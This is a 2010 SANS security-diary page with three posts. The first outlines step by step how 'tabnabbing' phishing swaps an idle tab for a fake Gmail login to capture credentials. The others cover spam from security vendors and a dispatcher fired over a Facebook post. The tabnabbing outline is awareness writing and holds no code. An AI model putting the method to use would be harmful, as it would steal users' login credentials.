Threat Level: green Handler on Duty: Manuel Humberto Santander Pelaez

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Tabnabbing new method for phishing.

Published: 2010-05-25
Last Updated: 2010-05-25 19:33:46 UTC
by donald smith (Version: 1)
5 comment(s)

New method for phishing discovered by Aza Raskin “creative” lead for firefox.

http://www.security.nl/artikel/33401/1/Duivelse_nieuwe_phishingaanval_gebruikt_tabs.html
I had to run this thru google translation service and it did a decent job but not perfect.
I modified it somewhat based on my understanding of the issue.
There is a good flash video that shows how the attack works.

Here are the steps as outlined in the translated version of his description.

User navigates to your normal looking site.

The phishing site detects when the page has lost focus and it hasn't been interacted with for a while.

Replace the favicon on the tab with the Google favicon, the title with "Gmail: Email from Google", and the page with a Google log look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.

The user scans their many tabs open, the favicon and title act as a strong visual cue and memory is malleable, moldable … and the user will simply think that they will most likely left a Gmail tab open. When they click back to the fake Gmail tab, they'll see the standard Gmail login page, assume they've been logged out, and provide their credentials to log in. When they click back to the Gmail tab fake, they'll see the standard Gmail login page, Assuming they've logged out, and provide their credentials to login. The attack preys on the perceived immutability of tabs.

Assuming the user had left a Gmail tab open where they had previously correctly authenticated. Also assuming the user has entered their login information and you've sent it back to your server, the phishing site can now redirect you to Gmail because they were never logged out in the first place, it will appear as if the login was successful.

 

Keywords:
5 comment(s)

Security people shouldn?t pay the "spam support system" for email lists to send SPAM

Published: 2010-05-25
Last Updated: 2010-05-25 16:51:09 UTC
by donald smith (Version: 1)
4 comment(s)

Yes this is a pet peeve of mine. I am not going to out the various security companies that do this but when I get SPAM from a “security company” I often report them to their ISP for AUP violation and attempt to educate the SPAMMER who sent the SPAM.

I recently replied to one of the many such SPAMs I received.

They were advertising a Security & Risk Management Summit taking place in Washington, DC.
I asked how they got my email address and was told they buy their lists from various sources.  I explained that by buying those lists they were feeding the spam support system. They didn’t respond to that comment so either they already knew and don’t care or felt it was justifiable.

I recommended that they ONLY use doubly opted-in lists. (Ones that you opt-in to and get an verification email sent to you to ensure someone else didn’t opt you in).

They did provide an opt-out option and when confronted stated that they were can-spam compliant. If you’re a security company and you send me SPAM expect me to respond and request termination of your service for AUP violation!


 

Keywords:
4 comment(s)

Face book ?joke? leads to firing.

Published: 2010-05-25
Last Updated: 2010-05-25 16:36:09 UTC
by donald smith (Version: 1)
10 comment(s)

From: 

http://www.news.com.au/breaking-news/firing-dispatcher-for-facebook-drug-joke-was-right-wisconsin-council-claims/story-e6frfku0-1225870794794

“A CITY council in Wisconsin defended its decision to fire a Police and Fire Department dispatcher who joked about drug addiction on her Facebook page.”

The arbitrator said the dispatcher could come back after a 30 day suspension but the police chief appears to believe her joke was so inappropriate and “an embarrassment to the city”.
Personally this seems a bit extreme, however social networking users should be aware investigating face book pages of employees is becoming more common.


 

Keywords: facebook firing
10 comment(s)
Diary Archives